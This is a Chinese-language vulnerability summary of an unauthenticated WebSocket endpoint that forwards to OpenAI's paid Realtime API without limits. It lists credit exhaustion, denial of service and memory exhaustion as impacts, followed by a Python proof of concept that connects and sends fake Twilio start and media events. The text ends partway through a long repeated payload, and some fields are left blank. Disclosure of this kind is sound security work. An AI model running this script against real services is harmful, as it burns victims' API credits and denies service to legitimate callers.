漏洞总结:Unauthenticated WebSocket Endpoint Proxies to Paid OpenAI Realtime API Without Rate Limits 漏洞概述 该漏洞存在于 文件中。 WebSocket 端点接受来自任何客户端的连接,而无需进行身份验证或签名验证。每个连接都会使用服务器的 API 密钥在 OpenAI 的 Realtime API 上打开一个经过认证的会话。该端点没有限制连接数、消息速率或消息大小,导致攻击者可以耗尽服务器资源并耗尽受害者的 OpenAI API 信用额度。 影响范围 受影响版本: CVSS 评分: 7.5 / 10 (High) 具体危害: 1. OpenAI API 信用耗尽: 每个未认证的 WebSocket 连接都会打开一个计费的 OpenAI Realtime API 会话。Realtime API 按每秒音频计费,这会造成巨大的财务损失。 2. 拒绝服务 (DoS): 当服务器资源(内存、文件描述符、OpenAI API 速率限制)被攻击者连接耗尽时,合法的 Twilio 呼叫者将无法获得服务。 3. 服务器内存耗尽**: 由于没有消息大小限制(默认为 10MB)和连接限制,攻击者可以通过发送大量大负载消息来消耗服务器内存。 POC 代码 (Proof of Concept) ```python Step 1: Verify the endpoint is accessible and accepts connections python -c " import asyncio import websockets import json async def test(): async with websockets.connect('ws://TARGET:8000/media-stream') as ws: Send a start event (mimicking Twilio) await ws.send(json.dumps({ 'event': 'start', 'start': {'streamSid': 'attacker-session-1'} })) Send a media event - this gets forwarded to OpenAI Realtime API await ws.send(json.dumps({ 'event': 'media', 'media': {'payload': '50V668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668g9yQ50v668